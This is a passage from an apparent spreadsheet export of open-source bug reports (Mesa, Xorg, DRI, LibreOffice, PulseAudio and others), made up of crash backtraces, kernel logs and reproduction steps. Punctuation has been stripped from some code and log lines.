Probe at (00)
  Expected: 5 4 3 1
  Observed: 39232272 0 0 1
  Input color: 5 4 3 2
GL_ALPHA8I_EXT:
Aborted (core dumped)
(gdb) bt
#0  0x00007feae49203b5 in __GI_raise (sig=6) at ../nptl/sysdeps/unix/sysv/linux/raise.c:64
#1  0x00007feae4923b1b in __GI_abort () at abort.c:92
#2  0x000000000042ac19 in test_format (info=0x457650) at piglit/tests/spec/ext_texture_integer/fbo-blending.c:224
#3  0x000000000042af2a in piglit_init (argc=1 argv=0x7fff5def36b8)
    at piglit/tests/spec/ext_texture_integer/fbo-blending.c:322
#4  0x000000000042bda5 in main (argc=1 argv=0x7fff5def36b8) at piglit/tests/util/piglit-framework.c:298
(gdb) frame 2
#2  0x000000000042ac19 in test_format (info=0x457650) at piglit/tests/spec/ext_texture_integer/fbo-blending.c:224
224			abort()
(gdb) l
219		case GL_RG_INTEGER:
220			expected_color[2] = 0
221			expected_color[3] = 1
222			break
223		default:
224			abort()
225		}
226	
227		if (piglit_probe_rect_rgba_uint(0 0 1 1 expected_color))
228			return PIGLIT_PASS
(gdb) print info-&gt;base_format
$1 = 36247
(gdb) print /x info-&gt;base_format
$2 = 0x8d97
$ grep 8D97 tests/util/glew.h 
#define GL_ALPHA_INTEGER 0x8D97
#define GL_ALPHA_INTEGER_EXT 0x8D97</t>
  </si>
  <si>
    <t>XORG-23755</t>
  </si>
  <si>
    <t>X does not work on Alpha</t>
  </si>
  <si>
    <t>X currently does not work on Alpha.
It's being actively investigated by a team of people.</t>
  </si>
  <si>
    <t>DRI-67043</t>
  </si>
  <si>
    <t>Atombios stuck in a loop during resume</t>
  </si>
  <si>
    <t>With mainline git kernel build from yesterday (3.11.0-rc1+ #7 SMP Wed Jul 17 11:34:34 EDT) I see resume takes longer and the below is printed in system log -
[ 7647.285017] sd 0:0:0:0: [sda] Starting disk
[ 7647.374821] [drm:atom_op_jump] *ERROR* atombios stuck in loop for more than 5secs aborting
[ 7647.374822] [drm:atom_execute_table_locked] *ERROR* atombios stuck executing CD3E (len 55 WS 0 PS 0) @ 0xCD61
I think this started after DPM commits. Prior kernels don't show this error.
Hardware is 
lspci |grep VGA
01:00.0 VGA compatible controller: Advanced Micro Devices [AMD] nee ATI Turks PRO [Radeon HD 7570]</t>
  </si>
  <si>
    <t>parag.warudkar</t>
  </si>
  <si>
    <t>DRI-90183</t>
  </si>
  <si>
    <t>[HSW] GPU HANG: ecode 7:0:0x86dfbff9 in compiz [1938] reason: Ring hung action: reset</t>
  </si>
  <si>
    <t>Created attachment 115341
dmesg boot log including error
This happened after resuming from S4 hibernate. Afterwards the system was unstable (worked for a couple minutes then panicked with blinking keyboard LEDs).
Attaching logs as per syslog instructions.
Kernel: 4.0.0-rc7+ (freedesktop git 631c2f8cb).
I also tried 4.0.0+ (freedesktop git 92bb36c80) but it wouldn't even boot on my machine (blank screen).
3.19.0+ (freedesktop git 89271faca1) works fine including S4.
Hardware: MSI-7817 Haswell chipset i5-4570 CPU. Ubuntu 14.04 with custom kernel.
[    0.000000] Linux version 4.0.0-rc7+ (root@linuxkiste) (gcc version 4.8.2 (Ubuntu 4.8.2-19ubuntu1) ) #7 SMP Sat Apr 11 19:43:31 CEST 2015
[    0.000000] Command line: BOOT_IMAGE=/vmlinuz-4.0.0-rc7+ root=/dev/mapper/linuxkiste--vg-root ro splash quiet vt.handoff=7</t>
  </si>
  <si>
    <t>jens-bugs.freedesktop.org</t>
  </si>
  <si>
    <t>POPPLER-28789</t>
  </si>
  <si>
    <t>pdftoppm padding of filenames</t>
  </si>
  <si>
    <t>This utility pads filenames in a conventional manner like so:
page-1.ppm page-2.ppm page-3.ppm ... page-9.ppm
page-01.ppm page-02.ppm page-03.ppm ... page-99.ppm
page-001.ppm page-002.ppm page-003.ppm ... page-100.ppm
However when the file produces *exactly* 100 files pdftoppm is inconsistent and names outputted files like this:
page-01.ppm page-02.ppm page-03.ppm ... page-99.ppm page-100.ppm
This means that page-100.ppm becomes ordered before page-10.ppm in the command line and when used in other places.</t>
  </si>
  <si>
    <t>DRI-105107</t>
  </si>
  <si>
    <t>[BAT] igt@gem_exec_suspend@basic-s3 - incomplete - timeout/system hang ?</t>
  </si>
  <si>
    <t>https://intel-gfx-ci.01.org/tree/drm-tip/CI_DRM_3774/fi-ilk-m540/igt@gem_exec_suspend@basic-s3.html
run.log:
running: igt/gem_exec_suspend/basic-s3
[107/288] skip: 26 pass: 81 \        
FATAL: command execution failed
...
CI_IGT_test runtime 228 seconds
Rebooting fi-ilk-m540
Last dmesg:
[  180.691764] Setting dangerous option reset - tainting kernel
[  180.694466] [IGT] gem_exec_suspend: starting subtest basic-S3
[  181.438453] PM: suspend entry (deep)
Looks like it never came up after suspend.</t>
  </si>
  <si>
    <t>don.hiatt</t>
  </si>
  <si>
    <t>MESA-36106</t>
  </si>
  <si>
    <t>kwin crash in i915_emit_state</t>
  </si>
  <si>
    <t>Created attachment 45448
full backtrace
When I try to configure one of my OpenGL screen savers that come with KDE Xorg crashes when I test start and exit one of them. Right now I'm reproducing this with the 'TopBlock' screen saver: http://topblock.sourceforge.net/
I spent some time rebuilding mesa with better debug options (-g3) and eventually got this backtrace:
Core was generated by `Xorg -core -nolisten tcp :0'.
Program terminated with signal 6 Aborted.
#0  0x00007f41bde0a0e5 in raise () from /lib64/libc.so.6
(gdb) bt
#0  0x00007f41bde0a0e5 in raise () from /lib64/libc.so.6
#1  0x00007f41bde0ba96 in abort () from /lib64/libc.so.6
#2  0x000000000045ffa1 in OsAbort ()
#3  0x000000000046a5d7 in ddxGiveUp ()
#4  0x000000000045cc20 in AbortServer ()
#5  0x000000000045ce08 in FatalError ()
#6  0x000000000045da9e in OsSigHandler ()
#7  
#8  0x00007f41bafd56a6 in i915_emit_state (intel=0x1075f60) at i915_vtbl.c:312
#9  0x00007f41bb0163bd in intelRenderStart (ctx=0x1075f60) at intel_tris.c:1088
#10 0x00007f41bb1125c5 in run_render (ctx=0x1075f60 stage=0x111c158) at tnl/t_vb_render.c:276
#11 0x00007f41bb0fe8b8 in _tnl_run_pipeline (ctx=0x1075f60) at tnl/t_pipeline.c:153
#12 0x00007f41bb01634a in intelRunPipeline (ctx=0x1075f60) at intel_tris.c:1075
#13 0x00007f41bb0fffaa in _tnl_draw_prims (ctx=0x1075f60 arrays=0x1119308 prim=0x1117a24 nr_prims=1 ib=0x0 min_index=0 max_index=3) at tnl/t_draw.c:518
#14 0x00007f41bb0ffccd in _tnl_vbo_draw_prims (ctx=0x1075f60 arrays=0x1119308 prim=0x1117a24 nr_prims=1 ib=0x0 index_bounds_valid=1 '\001' min_index=0 max_index=3) at tnl/t_draw.c:424
#15 0x00007f41bb0f13e5 in vbo_exec_vtx_flush (exec=0x1117740 unmap=1 '\001') at vbo/vbo_exec_draw.c:381
#16 0x00007f41bb0ed355 in vbo_exec_FlushVertices_internal (ctx=0x1075f60 unmap=1 '\001') at vbo/vbo_exec_api.c:911
#17 0x00007f41bb0ed3c5 in vbo_exec_FlushVertices (ctx=0x1075f60 flags=1) at vbo/vbo_exec_api.c:945
#18 0x00007f41bb09fe09 in _mesa_set_scissor (ctx=0x1075f60 x=1161 y=218 width=230 height=287) at main/scissor.c:75
#19 0x00007f41bb09fd7e in _mesa_Scissor (x=1161 y=218 width=230 height=287) at main/scissor.c:48
#20 0x00007f41bcaa4f5e in __glXDisp_Render () from /usr/lib64/xorg/modules/extensions/libglx.so
#21 0x00007f41bcaa7139 in __glXDispatch () from /usr/lib64/xorg/modules/extensions/libglx.so
#22 0x000000000042f572 in Dispatch ()
#23 0x0000000000424a7a in main ()
Looking at the source code i915_vtbl.c:312:
...
if (dirty &amp; I915_UPLOAD_BUFFERS) {
	aper_array[aper_count++] = state-&gt;draw_region-&gt;buffer /* &lt;== CRASH HERE */
	if (state-&gt;depth_region)
		aper_array[aper_count++] = state-&gt;depth_region-&gt;buffer
}
...
and then going back to gdb:
(gdb) f 8
#8  0x00007f41bafd56a6 in i915_emit_state (intel=0x1075f60) at i915_vtbl.c:312
312     i915_vtbl.c: No such file or directory.
        in i915_vtbl.c
(gdb) p *state
$12 = {Ctx = {1840513023 2097416003 4294967280 9445504 2 164454 1805650086 2106064896 0 1753235458 1761869823} Buffer = {2106458113 50331648 0 2106458113 117440512 0 2105868288 277349120 2088763395 2105606145 7144585 35652756 0 2105540611 0 0 68748663 0} Stipple = {2105737216 0} Fog = {1962934272 2106130434 2340421632 0 1065353216} Defaults = {0 0 0 0 0 0} RasterRules = {1728096112} Tex = {{0 125246850 4294955008 15872 9248 0} {0 0 0 0 0 0} {0 0 0 0 0 0} {0 0 0 0 0 0} {0 0 0 0 0 0} {0 0 0 0 0 0} {0 0 0 0 0 0} {0 0 0 0 0 0}} Constant = {2097545220 1 1065353216 1065353216 1065353216 1065353216 0 } ConstantSize = 6 Program = {2097479691 421003264 0 0 419970048 0 0 369098752 16777216 0 35666944 19070976 0 35660032 19070976 0 } ProgramSize = 13 draw_region = 0x0 depth_region = 0x0 tex_buffer = {0x2771180 0x0 0x0 0x0 0x0 0x0 0x0 0x0} tex_offset = {0 0 0 0 0 0 0 0} active = 65871 emitted = 0}
I can see that 'draw_region' is NULL and cannot be dereferenced. So now I know why Xorg crashes but I don't know why that pointer is NULL.
I'll attach a full backtrace too.</t>
  </si>
  <si>
    <t>mihai.dontu</t>
  </si>
  <si>
    <t>LIBREOFFICE-57545</t>
  </si>
  <si>
    <t>remove redundant capitalType functions</t>
  </si>
  <si>
    <t>See http://opengrok.libreoffice.org/search?q=capitalType&amp;project=core. Also using enum would look better for CAPTYPE values.</t>
  </si>
  <si>
    <t>quentin.pradet</t>
  </si>
  <si>
    <t>MESA-66558</t>
  </si>
  <si>
    <t>RS690: 3D artifacts when playing SuperTuxKart</t>
  </si>
  <si>
    <t>Created attachment 81975
Example of corruption in SuperTuxKart
Using the 300g driver from Mesa 9.1 the SuperTuxKart game sometimes shows artifacts as show in the attached example.</t>
  </si>
  <si>
    <t>bjoern-beutel</t>
  </si>
  <si>
    <t>FREEDESKTOP.ORG-7386</t>
  </si>
  <si>
    <t>I've been contributing to the r300 driver in Mesa and would like an account with
access to Mesa:
Name: Rune Petersen
E-mail: rune@megahurts.dk
Username: runepetersen
Keys:
-----BEGIN PGP PUBLIC KEY BLOCK-----
Version: GnuPG v1.4.3 (GNU/Linux)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=ZLcd
-----END PGP PUBLIC KEY BLOCK-----
ssh-rsa
AAAAB3NzaC1yc2EAAAABIwAAAQEAvziNNh5cQi7C9ZGRyzl1f+odtAX4BV36Z8fDWOpJO6j+J8ug/0Y25ZFFIRMQNxVNWOZow+FkZebGMP8GjdtAlD1b5JWcIBQYY3UVF1An216pwX3cOtJqfVfUl3tOnEKz15ZI3NINYpy/9X5KEEFG0deflDlrRSSbIpRy5NDn+vmvZ1Ukf4dgKAvS4QfFTl9nI3v6jNmzw/c5UDF2CvM6ZYJAcuUyCpB9tk3eMxZoZU/sbqy4za/SIO09Vp04BQFu3asH/dSw4SrMmMA16j8V1YKpUUkSamjvjaRtC1yd8t3rqzzFlBofWU+sNsOfpKSYqqe0y61eFW1W1eDQFxNWkw==
rune@runner
Thank you
Rune Petersen</t>
  </si>
  <si>
    <t>DRI-99463</t>
  </si>
  <si>
    <t>[BDW] GPU HANG: ecode 8:0:0x8ed1fff2 in hashcat [3442] reason: Hang on render ring action: reset / OpenCL</t>
  </si>
  <si>
    <t>Created attachment 129054
GPU crash dump
Running a benchmark in hashcat: $ hashcat -b --force causes a GPU hang after some time. 
x86_64
4.8.0-2-amd64 
Debian Stretch (Testing)
DELL E5550 (Core I5 5300U HD5500 GPU)
eDP
beignet-opencl-icd 1.2.1 
&gt;&gt;&gt;
[ 1424.947997] [drm] GPU HANG: ecode 8:0:0x8ed1fff2 in hashcat [3442] reason: Hang on render ring action: reset
[ 1424.947998] [drm] GPU hangs can indicate a bug anywhere in the entire gfx stack including userspace.
[ 1424.947998] [drm] Please file a _new_ bug report on bugs.freedesktop.org against DRI -&gt; DRM/Intel
[ 1424.947999] [drm] drm/i915 developers can then reassign to the right component if it's not a kernel issue.
[ 1424.947999] [drm] The gpu crash dump is required to analyze gpu hangs so please always attach it.
[ 1424.948000] [drm] GPU crash dump saved to /sys/class/drm/card0/error
[ 1424.948052] drm/i915: Resetting chip after gpu hang
[ 2171.573093] traps: hashcat[3420] trap int3 ip:7fea33433e68 sp:7fffd2459960 error:0 in libgbe.so[7fea3310f000+13d5000]
&lt;&lt;&lt;</t>
  </si>
  <si>
    <t>pj.crommen</t>
  </si>
  <si>
    <t>LIBREOFFICE-39288</t>
  </si>
  <si>
    <t>Can't print simple file w/ png graphic</t>
  </si>
  <si>
    <t>Created attachment 49183
Simple letterhead with png logo.
Attached is a very simple letterhead with a png logo.
Prints in OpenOffice errors-out in LibreOffice.  Remove the graphic &amp; it prints fine.
Using Mint Linux 10 (based on Ubuntu) with an HP LaserJet 4L.</t>
  </si>
  <si>
    <t>Lance</t>
  </si>
  <si>
    <t>PACKAGEKIT-16965</t>
  </si>
  <si>
    <t>gpkg-application 0.2.3 stops if gpgcheck  enabled in repo but gpgkey not installed</t>
  </si>
  <si>
    <t>gpk-application 0.2.3 stops with the following error :-
Error Type: 
Error Value: object of type 'instancemethod' has no len()
  File : /usr/share/PackageKit/helpers/yum/install-packages.py  line 19 in 
    backend.install_packages(packages)
  File : /usr/share/PackageKit/helpers/yum/yumBackend.py  line 226 in wrapper
    func(*args**kwargs)
  File : /usr/share/PackageKit/helpers/yum/yumBackend.py  line 949 in install_packages
    self._runYumTransaction()
  File : /usr/share/PackageKit/helpers/yum/yumBackend.py  line 1151 in _runYumTransaction
    hex_fingerprint = 80740e5 * len(fingerprint) 158781488ple(map(ord fingerprint))
This occurs if the PGP-KEY is not installed for the appropriate repo server and gpgcheck is enabled.
In my case I was trying to install vlc* from rpm.livna.org on Fedora 9 (i386 Linux hp-laptop 2.6.25.11-97.fc9.i686 #1 SMP Mon Jul 21 01:31:09 EDT 2008 i686 i686 i386 GNU/Linux). I installed livna's PGP-KEY and the error went away.</t>
  </si>
  <si>
    <t>mustafamehmed</t>
  </si>
  <si>
    <t>LIBREOFFICE-31624</t>
  </si>
  <si>
    <t>INSTALLATION: Associate Flat XML documents with LibreOffice if XSLT filters will be installed</t>
  </si>
  <si>
    <t>On windows the default install of LibreOffice is not able to load the Flat XML variants (.fodt .fods .fodp etc.) of the ODF files. Please include the requried XML filter and respective file associations with the default install of LibreOffice.</t>
  </si>
  <si>
    <t>LIBREOFFICE-67576</t>
  </si>
  <si>
    <t>setting printing page size in File-&gt;Print requires clicking new Use only paper size from printer preferences checkbox</t>
  </si>
  <si>
    <t>Since I have LibreOffice 4.1.0 installed the paper format used by the print menu (and also finally used by the printer) does not correspond to what I've set in the printer properties menu. It always uses the page size of the document or the nearest bigger format which is the printer compatible with. (I'm sorry I have tested it only in writer before I went back to 4.0.4). I have Windows7 and the HP PSC-1510 printer I also tried some virtual pdf printers with the same result.</t>
  </si>
  <si>
    <t>chilamchilam</t>
  </si>
  <si>
    <t>DRI-74335</t>
  </si>
  <si>
    <t>[UVD] vdpau has terrible performance on radeonsi (HD 7950)</t>
  </si>
  <si>
    <t>Follow up of https://bugs.freedesktop.org/show_bug.cgi?id=71448
Here is a video which hangs 100% of the times:
https://mega.co.nz/#!eQhSjJQR!EEe8-taN5IspIu-RW0WQzmvKzc5fkCn282kS5ugZ_as
Play with
mplayer2 -vo vdpau -vc ffmpeg12vdpauffwmv3vdpauffvc1vdpauffh264vdpauffodivxvdpau PlanetEarthBirds.mkv</t>
  </si>
  <si>
    <t>darkbasic</t>
  </si>
  <si>
    <t>PULSEAUDIO-93443</t>
  </si>
  <si>
    <t>[abrt] pulseaudio: pa_sink_input_set_requested_latency_within_thread(): pulseaudio killed by SIGSEGV</t>
  </si>
  <si>
    <t>Changing the card profile via set-card-profile causes a crash in the PulseAudio daemon. It does not happen every time but I can generally repeat it by rebooting and then attempting the set-card-profile again.
Maybe it is related to the changes required to fix  Bug #90416?
Here is the upstream bug report that has all the abrt attachments: https://bugzilla.redhat.com/show_bug.cgi?id=1291954.
Fedora retrace: https://retrace.fedoraproject.org/faf/reports/933887/
Version-Release number of selected component:
pulseaudio-7.1-1.fc23
Additional info:
reporter:       libreport-2.6.3
backtrace_rating: 4
cmdline:        /usr/bin/pulseaudio --start --log-target=syslog
crash_function: pa_sink_input_set_requested_latency_within_thread
executable:     /usr/bin/pulseaudio
global_pid:     30944
kernel:         4.2.6-301.fc23.x86_64
runlevel:       N 5
type:           CCpp
uid:            1000
Truncated backtrace:
Thread no. 1 (7 frames)
 #0 pa_sink_input_set_requested_latency_within_thread at pulsecore/sink-input.c:1172
 #1 pa_sink_invalidate_requested_latency at pulsecore/sink.c:3089
 #2 pa_sink_process_msg at pulsecore/sink.c:2621
 #3 asyncmsgq_read_work at pulsecore/rtpoll.c:566
 #4 pa_rtpoll_run at pulsecore/rtpoll.c:236
 #5 thread_func at modules/alsa/alsa-sink.c:1798
 #6 internal_thread_func at pulsecore/thread-posix.c:81</t>
  </si>
  <si>
    <t>rocketraman</t>
  </si>
  <si>
    <t>PULSEAUDIO-96612</t>
  </si>
  <si>
    <t>crash in module-rtp-recv.c:271</t>
  </si>
  <si>
    <t>Loading module-rtp-recv results in a crash. This is on Ubuntu 16.04 PulseAudio package version 1:8.0.0-0ubuntu3.
Please see this thread for context:
https://lists.freedesktop.org/archives/pulseaudio-discuss/2016-June/026377.html
Here's the backtrace:
(gdb) bt full
#0  0x00007ffff6311418 in __GI_raise (sig=sig@entry=6) at ../sysdeps/unix/sysv/linux/raise.c:54
        resultvar = 0
        pid = 35355
        selftid = 35359
#1  0x00007ffff631301a in __GI_abort () at abort.c:89
        save_stage = 2
        act = {__sigaction_handler = {sa_handler = 0x2c00000011 sa_sigaction = 0x2c00000011} sa_mask = {__val = {176093659154 0 0 
              140737111419872 140737114283993 6785184 6798368 0 140737324591616 140737111422464 140737018593368 0 140737018596576 
              0 140737200119808 140737111419728}} sa_flags = -141746104 sa_restorer = 0x50c}
        sigs = {__val = {32 0 }}
#2  0x00007ffff78d2051 in pa_memblockq_push (bq=0x73f460 uchunk=0x7fffe9886c20) at pulsecore/memblockq.c:289
        q = 0x3f
        n = 0x7fffe9886b30
        chunk = {memblock = 0x575ae614 index = 540414 length = 3955821}
        old = 0
        __func__ = pa_memblockq_push
        __PRETTY_FUNCTION__ = pa_memblockq_push
#3  0x00007fffcb9ed235 in rtpoll_work_cb (i=0x7fffe4000b20) at modules/rtp/module-rtp-recv.c:271
        chunk = {memblock = 0x7fffeed1e000 index = 12 length = 1280}
        k = 0
        j = 4294967296
        delta = 0
        now = {tv_sec = 3955821 tv_usec = 947295}
        s = 0x6f7fc0
        p = 0x66f0b8
        __func__ = rtpoll_work_cb
        __PRETTY_FUNCTION__ = rtpoll_work_cb
#4  0x00007ffff7b5c000 in pa_rtpoll_run (p=0x7c8240) at pulsecore/rtpoll.c:696
        k = 0
        defer_event = 0x0
        time_event = 0x0
        i = 0x7fffe4000b20
        r = 0
        timeout = {tv_sec = 70528 tv_usec = 0}
        next_time_event = 0x0
        next_time_event_elapse = {tv_sec = 3955821946850 tv_usec = 4754025810059539968}
        timer_enabled = false
        __func__ = pa_rtpoll_run
        __PRETTY_FUNCTION__ = pa_rtpoll_run
#5  0x00007fffe98be040 in thread_func (userdata=0x666bb0) at modules/alsa/alsa-sink.c:1799
        ret = 1
        rtpoll_sleep = 0
        real_sleep = 0
        u = 0x666bb0
        revents = 0
        __func__ = thread_func
        __PRETTY_FUNCTION__ = thread_func
#6  0x00007ffff78f43fe in internal_thread_func (userdata=0x7c33e0) at pulsecore/thread-posix.c:81
        t = 0x7c33e0
        __func__ = internal_thread_func
        __PRETTY_FUNCTION__ = internal_thread_func
#7  0x00007ffff6dc16fa in start_thread (arg=0x7fffe9887700) at pthread_create.c:333
        __res = 
        pd = 0x7fffe9887700
        now = 
        unwind_buf = {cancel_jmp_buf = {{jmp_buf = {140737111422720 -6710472414859945635 0 140737488343983 140737111423424 0 
                6710451357242300765 6710488085811763549} mask_was_saved = 0}} priv = {pad = {0x0 0x0 0x0 0x0} data = {prev = 0x0 
              cleanup = 0x0 canceltype = 0}}}
        not_first_call = 
        pagesize_m1 = 
        sp = 
        freesize = 
        __PRETTY_FUNCTION__ = start_thread
#8  0x00007ffff63e2b5d in clone () at ../sysdeps/unix/sysv/linux/x86_64/clone.S:109</t>
  </si>
  <si>
    <t>XORG-84653</t>
  </si>
  <si>
    <t>Server/Ext/RandR</t>
  </si>
  <si>
    <t>xorg segfault when disabling and reenabling kwin compositing with dri2 gpu offloading</t>
  </si>
  <si>
    <t>Created attachment 107312
full backtrace
00:02.0 VGA compatible controller: Intel Corporation 3rd Gen Core processor Graphics Controller (rev 09)
01:00.0 VGA compatible controller: Advanced Micro Devices Inc. [AMD/ATI] Wimbledon XT [Radeon HD 7970M] (rev ff)
0. xrandr --setprovideroffloadsink radeon Intel
1. Start 3d program with DRI_PRIME=1 GALLIUM_HUD=fpsVRAM-usage+GTT-usagerequested-VRAM+requested-GTTnum-bytes-moved LIBGL_DRI3_DISABLE=1 whatever
2. Press ctrl+alt+f12 hotkey to toggle kwin compositing twice
3. segfault
Happens every time.
xorg-server 1.16.1
xf86-video-intel xf86-video-ati and mesa from recent git master</t>
  </si>
  <si>
    <t>LIBREOFFICE-31741</t>
  </si>
  <si>
    <t>Links to other files created if broken links inside (FILEOPEN)</t>
  </si>
  <si>
    <t>Hello
If you have broken links in your sheet when LibO open your file it ask you links to other files should be updated.
Steps to reproduce:
- create a new Calc file
- add data in Sheet1
- in Sheet2 insert link such as: =Sheet1.A1
- in Sheet1 remove lines with the data
=&gt; in Sheet2 there is a reference error with #NAME ? (normal behavior)
- save your file
- reload it
=&gt; LibO ask This file contains links to other files. Should they be updated?
In command Edit &gt; Links you get all links created (one per reference error).
You may simply ignore this message but it is quite disturbing. File content is not affected as OOo can open and does not find any link.</t>
  </si>
  <si>
    <t>LIBREOFFICE-61453</t>
  </si>
  <si>
    <t>[DE] UI: Writer 'Character Style - Name field' to short</t>
  </si>
  <si>
    <t>Created attachment 75518
Screenshot shows wrapped name of style
Steps how to reproduce [Reproducible] with Server Installation of LibO  4.0.1.1+   -  German UI / German Locale  [Build ID: 2c0c17a6e4bee0ee28131ea4bdc47edc700d659)]  {tinderbox: @6 pull time  2013-02-1920:00(?)} on German WIN7 Home Premium (64bit) with newly created user profile â€¦.\LODev\4\:
1. open new Write document from LibO Start Center
2.  for Styles pane
3. Click Character Styles
4. Rightclick -&gt; Modify for style 
   Stichwortverzeichnis Haupteintrag
5. Tab Verwalten (Organize)
   Bug: Grey area for name too short
More info:
----------
For unknown reasons the field is shorter than in english UI but also the English field would be to short for this long name.
Currently I believe it's pointless where that started.
Operating System: Windows 7
Version: 3.6.5.2 release</t>
  </si>
  <si>
    <t>LIBREOFFICE-49709</t>
  </si>
  <si>
    <t>: Fields in embedded bibliography gets switched around</t>
  </si>
  <si>
    <t>Problem description:
Something strange is going on with the editor.
Steps to reproduce (translated from Danish):
1. Create a new entry and insert it
2. Right click the reference and select Bibliography entry
3. Click Edit and click on any element including the already selected element in the Short name select list
Current behavior:
The data in each field is moved to another field - looks messy but is always the same.
Expected behavior:
Platform (if different from the browser):
Windows 7</t>
  </si>
  <si>
    <t>k.dalgard</t>
  </si>
  <si>
    <t>DRI-102500</t>
  </si>
  <si>
    <t>[polaris10 vega10][amd-staging-4.12 amd-staging-drm-next] GPU fault detected somethimes lockup</t>
  </si>
  <si>
    <t>Created attachment 133914
dmesg - start gnome 3 session only
Hi 
Afer today kernel update witcher 3 hangs. After restart (only Gnome3 session is running) in kernel log i see lot of:
...
amdgpu 0000:01:00.0: GPU fault detected: 146 0x0d023d14
amdgpu 0000:01:00.0:   VM_CONTEXT1_PROTECTION_FAULT_ADDR   0x001061A0
amdgpu 0000:01:00.0:   VM_CONTEXT1_PROTECTION_FAULT_STATUS 0x0903D014
amdgpu 0000:01:00.0: VM fault (0x14 vmid 4) at page 1073568 write from 'SDM1' (0x53444d31) (61)
...
downgrade kernel resolve this issue. 
I use binary kernel from unofficial arch's repo:
linux-amd-staging 4.12.0.680862.7be0a528b097 - the bad one 
linux-amd-staging-4.12.0.680853.eeb9985d7228 - works great
these kernels are built from alex's git tree branch amd-staging-4.12
OpenGL renderer string: AMD Radeon (TM) RX 470 Graphics (POLARIS10 / DRM 3.18.0 / 4.13.0-rc7-mainline LLVM 6.0.0)
OpenGL core profile version string: 4.5 (Core Profile) Mesa 17.3.0-devel (git-2d93b462b4)</t>
  </si>
  <si>
    <t>PULSEAUDIO-99223</t>
  </si>
  <si>
    <t>webcam mic not set to default alternative</t>
  </si>
  <si>
    <t>opensuse 42.2
pulseaudio 9.0
webcam logitech C310
there is only one micro micro of webcam
in kde multimedia settings webcam is well listed and active
in pavucontrol webcam port is microphone and webcam is not default alternative this is internal audio analog stereo which is default alternative
if i set webcam to default alternative and i restart pc then webcam is no more default alternative
according to use webcam mic with hangouts for eaxample
then
in kde multimedia settings i must set to high priority webcam</t>
  </si>
  <si>
    <t>GSTREAMER_SDK-77557</t>
  </si>
  <si>
    <t>iOS SDK distribution</t>
  </si>
  <si>
    <t>doesn't seem possible to set config variables for lib-ac</t>
  </si>
  <si>
    <t>I'm been playing with this for days with no luck. I have a simple little task that is proving impossible.
I need to set this value for get-libav
config.status: executing configure-embedded-libav commands
Configuring included Libav instance with args --prefix=/Users/michelle211/cerbero/dist/ios_universal --disable-avserver --disable-avplay        --disable-avconv --disable-avprobe --enable-static --enable-pic 	--disable-encoder=flac --disable-decoder=cavs --disable-protocols --disable-devices	--disable-network --disable-hwaccels --disable-dxva2 --disable-vdpau	--disable-filters --disable-doc --enable-optimizations --ar=$AR --as=$CC --cc=$CC --ld=$CC --nm=$NM 
to 
this
config.status: executing configure-embedded-libav commands
Configuring included Libav instance with args --prefix=/Users/michelle211/cerbero/dist/ios_universal --disable-avserver --disable-avplay        --disable-avconv --disable-avprobe --enable-static --enable-pic 	--disable-encoder=flac --disable-decoder=cavs  --disable-hwaccels --disable-dxva2 --disable-vdpau --disable-doc --enable-optimizations --ar=$AR --as=$CC --cc=$CC --ld=$CC --nm=$NM 
Following instructions I create a new remote  add that to the libav static recipe
In my git version of lib-av I searched and found the config parms in configure.ac
and changed them
I ran build one and nothing changed it still used the same parameters.</t>
  </si>
  <si>
    <t>michelle211</t>
  </si>
  <si>
    <t>MESA-94080</t>
  </si>
  <si>
    <t>[HSW] intel_do_flush_locked failed: Invalid argument in dEQP-GLES31.functional.compute.indirect_dispatch.upload_buffer.single_invocation</t>
  </si>
  <si>
    <t>Created attachment 121652
INTEL_DEBUG=batbuf output prior to error
I reliably get the attached (INTEL_DEBUG=batbuf) error when running:
MESA_GLES_VERSION_OVERRIDE=3.1 ./deqp-gles31 --deqp-visibility=hidden --deqp-case='dEQP-GLES31.functional.compute.indirect_dispatch.upload_buffer.single_invocation'
Note that I have Ken's recent patch series to fix up some compute state tracking: https://patchwork.freedesktop.org/series/3213/ although the error also happens without it.
This dEQP build is from https://android.googlesource.com/platform/external/deqp + a minor patch to make it actually build (libpng.h -&gt; png.h in CMakeLists.txt). You'll need Xorg 1.18.1 or the relevant GLX patch for it to work too. Please ask if you're having trouble getting it up and running or need any additional debug info this reproduces 100% for me.</t>
  </si>
  <si>
    <t>LIBREOFFICE-49677</t>
  </si>
  <si>
    <t>odf_validation styles.xml: missing xlink:type attribute on text:a</t>
  </si>
  <si>
    <t>Created attachment 61272
Complete Validation results
Document source: See URL
Steps how to reproduce: Download sample document open with LibO Version mentioned below then do validator tests
Text document saved with:  LibreOffice 3.5.3.2 (RC2) German UI/Locale [Build-ID: 235ab8a-3802056-4a8fed3-2d66ea8-e241b80] on German WIN7 Home Premium (64bit) 
PDF File Format: 1.2 Extended
Validation results (+ = ok - = not ok) Message behind
+ odf-validator.rhcloud: 
  Finding_out_whats_going_on_350_odf12.odp/styles.xml[2129804]:
   Error: element text:a is missing type attribute  (and similar)
+ Officeotron: this problem not detected in  styles.xml (?)
+ Cyclone: not tested
+ ODFToolkit: not tested HTTP ERROR 412
+ opendocumentfellowship: only ODF1 tests possible</t>
  </si>
  <si>
    <t>XORG-12825</t>
  </si>
  <si>
    <t>TvTime shows only the upper left corner (~ 1280x1024) in Randr1.2</t>
  </si>
  <si>
    <t>At higher resolutions greater than 1280x1024 TvTime only shows the top left it seems to 1280x1024 the rest is blue. If I see Tvtime in small window in the upper left is well if I put the window in the lower right corner is all blue.
The gdm starts with a resolution of 1280x1024 with nv boots to the maximum resolution of monitor 2048x1536.
The screen displayed a line of vertical pixel roses on the right side and a more thin at the bottom.
Tvtime does not show any error.</t>
  </si>
  <si>
    <t>david.hernando.m</t>
  </si>
  <si>
    <t>TELEPATHY-27415</t>
  </si>
  <si>
    <t>Bad usage of _add_immutables in ChannelTypeRoomList</t>
  </si>
  <si>
    <t>Another little bug in ChannelTypeRoomList class. For now calling of _add_immutables in that class looks like self._add_immutables(self {'Server': CHANNEL_TYPE_ROOM_LIST}) but function _add_immutables needs just self and props so I attached a small patch to fix it.</t>
  </si>
  <si>
    <t>DRI-97471</t>
  </si>
  <si>
    <t>kworker consumes 100% of a cpu core when screen sleeps with amdgpu kernel driver.</t>
  </si>
  <si>
    <t>Created attachment 126008
System information and perf data
Hi
I have configured my system to use the amdgpu kernel driver (note no experimental support activated) on openSUSE Tumbleweed and running 4.8.0-rc2-3.gda13dfd-default. I did have to re-build the xf86-video-amdgpu to add my Mullins R5 PCI-IDs. I don't see this when running the radeon driver.
Reproducible: Always
Steps to Reproduce:
1. Boot to Gnome desktop.
